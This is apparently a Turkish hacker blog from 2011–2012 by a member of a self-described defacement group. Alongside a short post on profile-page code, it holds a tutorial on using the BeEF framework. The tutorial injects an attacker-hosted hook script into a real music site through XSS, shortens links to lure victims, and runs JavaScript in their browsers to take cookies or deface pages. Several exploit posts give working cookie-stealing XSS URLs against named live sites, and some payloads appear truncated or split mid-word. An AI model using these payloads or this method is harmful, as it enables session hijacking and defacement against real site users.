19 Ocak 2012 Perşembe

Profil Alanı Kodlamam

Selamun Aleyküm.
Yaklaşık 1 saatte basit bir profil alanı(memberinfo)kodladım ve sizlerle paylaşmak istedim.Sade ve güzel oldu.İsterseniz kodlara bakıp yararlanırsınız iserseniz direk kullanırsınız.
Uzmanlık alanlarını çekerken yan tarafta field6 gibi şeyler yazdığımı göreceksiniz.Siz orada kendi uzm. alan fieldlarınızı yazacaksınız.

 

Direk Kodlar :
http://www.sagorap.net/kodlar.txt

BeEF Anlatım

Selamun Aleyküm arkadaşlar.
Uzun bir süredir anlatım yapmıyorum.Aktiflik sıkıntısı yaşıyordum.Vakit buldum ve bu anlatımı yapmak istedim.
Sizlere BeEF uygulamasından bahsedeceğim.BeEF kişinin tarayıcısını kontrol altına almanızı sağlayan içinde fazla özelliği bulunan bir uygulamadır.Nasıl yediririr derseniz onuda bir aşağılarda anlatıcam.Windows ve backtrack üzerinde kullanılabilir.Backtrackta zaten default olarak gelmektedir.Ben BT üzerinden göstereceğim.Benimde sevdiğim güzel bir yöntemdir.

Bt tarafında BeEF kısmında ulaşmak için
BackTrack - Exploitation Tools - Social Engineering Tools - BeEF XSS Framework - beef
Yolunu izliyoruz :)



Karşınıza bu tip html içerisinde bazı kodlar gelecektir.Bunlar siteye gömmek isterseniz diye javascript kodlarıdır.Ben xss üzerinden anlatıma devam edeceğim.

İlk olarak arada bir adres göreceksiniz http://192.168.87.129/beef/ girdiğiniz zaman karşınıza direk beef ekranı gelecektir zaten.



Apply config diyoruz.
Edit 'pw.php' in BeEF root to alter the password
yazıyor yan tarafta.
pw.php dosyasından şifreye bakarsak default olarak BeEFConfigPass girilmiştir.Apply sonrasında finish'e tıklıyoruz.Moduller vs geliyor.



Şimdi xss kısmında kullanacağımız kodu görmek için http://192.168.87.129/beef/hook/example.php linkine bakıyoruz.

<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

kodu geldi.Bunu xss olan bir sitede kullanacağız.Örnek şuan benim elimde TTnet müzik bulunmakta.Bu linki kolayca yedirebiliriz.Kodları xss olan kısma yerleştiriyoruz.

www.ttnetmuzik.com.tr/#arama-<script>alert(document.domain)</script>

http://www.ttnetmuzik.com.tr/#arama-<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

Bunu tıklanma kısmı kalıyor.Bazen linkler çok uzun geliyor insanlar tıklamadan önce düşünüyor bu gibi durumlarda linkleri kısaltmak için siteler mevcut.Karşı taraf linke tıkladığı zaman zombies kısmında görünecektir..



Örnek karşı tarayıcıdaki kişiye bir mesaj göndermek istiyoruz.O zaman zombies kısmındaki ip adresine bir kere tıklıyoruz seçili hale getiriyoruz ardından standart modul kısmında alert dialog kısmını seçiyoruz.Mesajı yazıyoruz ve send now diyoruz.Ben sanal pc backtrack üzerinden windows'a uyguluyorum bunları...



Standart modul kısmında en alt kısımda raw javascript görmektesiniz.Buda kurbanda javascript kodlarını çalıştırmanıza olanak sağlar.Böylece cookie bilgilerini çekebilirsiniz.gene standart kısmında deface web page ile sayfayı komple değiştirip kendi yazınızı koyabilirsiniz.

Daha bir çok özellik bulunmaktadır.Ben temel şeylerden ve nasıl yapılacağından bahsettim.Biraz kurcalama ile bu işi kolayca başarabilirsiniz.

Hem zaman derim XSS'de iş var ^^

TTnet Cross Site Scripting

# Exploit Title: TTnet XSS
# Date: 15.01.2011 - 18.48
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

XSS - Search BOX
http://www.ttnetmuzik.com.tr/#arama-%3Cscript%3Ealert%28d
ocument.cookie%29%3C/script%3E

<script>alert(document.cookie)</script>
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
DarkDevilz.In 
 
 
http://packetstormsecurity.org/files/108698/ttnet-xss.txt 

25 Aralık 2011 Pazar

GraphicClone Cross Site Scripting

# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/

<script>ale rt(document.cookie)</script>

http://graphics.cloneforest.com/search/?term=<script>alert( document.cookie)</script>

XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
GrayHatz.co

9 Aralık 2011 Cuma

Pet Listing Cross Site Scripting

Aktiflik sıkıntısını yaşıyorum.Kendi ismim ile bazı işlere imza attım.Ondan dolayı pek boş zamanım olmuyor.Olduğu zamanda şekil a görüntü b böyle araştırıyoruz ^^

# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">



DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

26 Kasım 2011 Cumartesi

Whois

WHOIS.COM

http://domains.whois.com/

http://domains.whois.com/hosting.php?type=%22%3E%3Cscript%3Ealert%28%22DarkDevilZ%20/%20Mr.PaPaRoSSe%20/%203spi0n%22%29%3C/script%3E

Mr.PaPaRoSSe / DarkDevilz/ 3spi0n

20 Kasım 2011 Pazar

CareerBuilder Cross Site Scripting

# Exploit Title: CareerBuilder XSS
# Date: 20.11.2011 - 05.50
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

search box

al ert(document.cookie)

DEMO
http://www.eenbaan.nl/banen/zoeken/?keyword=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/107157/careerbuilder-xss.txt